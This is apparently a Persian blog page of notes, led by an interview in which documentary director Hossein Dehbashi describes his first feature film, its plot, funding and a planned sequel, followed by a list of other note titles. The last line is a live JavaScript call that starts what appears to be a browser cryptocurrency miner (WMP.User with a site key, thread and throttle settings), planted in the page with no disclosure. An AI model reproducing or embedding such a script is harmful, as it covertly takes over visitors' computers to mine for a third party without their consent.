یادداشت‌ها

یادداشت 273

‏«ماندن در وضعیت آخر» فیلمی به شدت سیاسی است/ شهدای خان طومان سوژه فیلم بعدی / حسین دهباشی در تدارک ساخت اولین و دومین فیلم داستانگوی اجتماعی خود است که به زودی جلوی دوربین می‌روند.

حسین دهباشی کارگردان مستند سینمای ایران در تدارک ساخت اولین فیلم بلند سینمایی خود است، دهباشی در گفت و گو با خبرنگار سینمایی ما درباره چگونگی آماده سازی و مراحل تولید فیلم گفت: «ماندن در وضعیت آخر» یک فیلم داستان گوی اجتماعی است، درباره زندگی امروز خیلی از ما. در مورد دنیایی که گاه آنقدر سخت و بی رحم است که برای فرار از آن پناه می بریم به زندگی مجازی. این فیلم درباره احساس گناهکاری و آرزوی رستگاری است اما نه با قاعده و کلیشه های مرسوم آن.»

وی درباره زمان روایت قصه توضیح داد: « کل قصه فیلم در آینده رخ می دهد از حوالی اذان مغرب تا سحر یک عید فطر، یک زن و مرد که ظاهراً خیلی با هم فرق دارند نهایتا مجبور به دوستی با یکدیگر می شوند بی آنکه همدیگر را ببینند یا ذره‌ای از تفاوت هایشان کم شود. داستان فیلم اقتباس آزادی است از یکی از فیلم های بسیار قدیمی سیدنی پولاک کارگردان محبوبم به نام سیم باریک که کمتر در ایران دیده شده است و با وجودی که داستانش قدیمی است انگار برای همین امروز نوشته شده است. یا بهتر بگویم انگار تاریخ مصرف ندارد.»

کارگردان مستند «عطر سیب شکوفه زیتون» در ادامه گفت: «این نخستین فیلم سینمایی من است و به عنوان یک مستند ساز که ریشه در روایت فتح دارد معلوم است که این فیلم نیز برایم مثل یک جور جنگیدن است جنگیدن البته با فراموشی ، با ناامیدی ، با کم آوردن در بر ابر روزگار، جنگ برای یادآوری . این فیلم بخش نخست از یک مجموعه سه تایی است. بخش دوم آْن فیلمی است درباره شهدای گرانقدر در محاصره خان طومان . مردهایی با موهای سپید و چهره های آفتاب خورده و پیشانی های پرچروک که از قضا اغلب همان هایی هستند که دو دهه قبل وقتی بیشترشان نوجوان بودند باز هم مسئولیت امنیت ایران و ایرانی ها بر دوش لاغر اندامشان بود از سویی دیگر «ماندن در وضعیت آخر» که اسم آن برگرفته از نام کتابی مشهور و ارزشمندن از توماس هریس است فیلمی به شدت سیاسی است از این منظر که سیاست دست از سر زندگی آدم های معمولی هم برنمی دارد ».

وی درباره سرمایه گذاری و نحوه ساخت فیلم گفت: «فیلم با سرمایه گذاری شخصی این جانب تهیه می شود، تهیه کننده همدلی پیدا شودمعلوم است که استقبال می کنیم . چون فعلا دستمان تنگ است تهدید در این تنگدستی را بدل کرده ایم به فرصت بازیگری بازیگران جوانی که البته در صحنه تئاتر خوش درخشیده اند اما در عرصه پررقابت و محدود سینمای وطنی راه پیدا نکرده اند و گمنام اند هنوز . »


کارگردان مستند «نفت و شکلات» درباره آماده سازی فیلمنامه  و آغاز فیلمبرداری گفت: «کار فیلمنامه اش اگر خدا بخواهد در شرف اتمام است و به زودی آن را جلوی دوربین می بریم و البته چند نمایی از آن را پیش تر در حرم شاهچراغ در شیراز پر از شعر و ناز ضبط کرده ایم انشاءالله که به جشنواره همین امسال هم برسد. و گرچه حضور در مهمترین رخداد سینمای ایران افتخاری است برای امثال ما اما گمان نکنیم حاصل کار چندان جشنواره پسند باشد و انشاءالله مورد رضایت همین بر و بچه هایی باشد که صد ها فرسخ دورتر از مرزهای این وطن با دست های خالی ایستاده و پرچم افراشته اند به وطن داری و تداوم آرامش ما روشنفکران و هنرمندان»

ارسال کننده: حسین دهباشی
تاریخ: 03 مرداد 1395
یادداشت 359

دو آزادی در یک روز:

یادداشت 358

برای خواندن سلسله مطالب "مسافر جاده هراز" زندگی نامه خودنوشت افشین علاء به کانال شخصی او مراجعه فرمایید.

یادداشت 357

هو الله

یادداشت 356

در نقد مقایسه رذیلانه‌ی انتخاب ترامپ و انتخاب احمدی نژاد / علی علیزاده

یادداشت 355

من مرگِ هیچ معلّمی را باور نمی‌کنم!/ در سوگِ تورانِ میرهادی

یادداشت 354

‏[ از شُمارِ دوچشم | یک تن کم | وز شُمارِ خرد... | هزاران بیش ] «تورانِ میرهادی» | نازنین دُردانهء آموزش و پرورشِ نوینِ ایران درگذشت

یادداشت 354

اُمیدِحسینی | که البتّه نگاهِ سیاسی بسیار متفاوتی با نگارنده دارد | نیازی به هیچ تبلیغی ندارد | وبلاگِ «آهستان» که در شمارِ پُرمغزونغزترین ذخایرِ جناحِ اصولگرایِ مجازستان بوده است، هم! | و کانالِ تازه تاسیسِ او در تلگرام نیز لابُد چنان می‌شود | خواندنی و لب‌ریز و لب‌سوز و لب‌دوز!| علیکم به عضویت و پیگیریِ آن:

یادداشت 353

کتاب‌های زرد می‌توانند رقیب فضای مجازی و ماهواره باشند

یادداشت 352

پیامی سرگشاده به بچه‌های بالا! / در فضیلتِ پیشگیری قبل از درمان!

یادداشت 350

دودوتا؟ لُبنان‌تا!/ مهردادِ فرهمند

یادداشت 349

محسن میردامادی |سردبیر روزنامه سلام، دبیرکل جبهه مشارکت: " شورای امنیت سازمان ملل صلاحیت ندارد، ملّت آمریکا به وظیفهء خود در مورد گروگانگیری ما عمل کنند، همه کسانی که در سفارت آمریکا کار می‌کردند از نظر ما مجرم و جاسوس هستند، محاکمه را ممکن است به دادگاه لاهه بسپاریم، اگر آمریکا را محکوم کرد قبول می‌کنیم، در غیر این صورت رای آن هیچ بها و ارزشی برای ما ندارد..."

یادداشت 348

‏شمریم! اگر روزِ ستم خاموشیم خون است! اگر آبِ خُنک می‌نوشیم آن‌سویِ جهان کرب و بلایی بر پاست ما هم دلمان خوش است! مشکی پوشیم!
var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();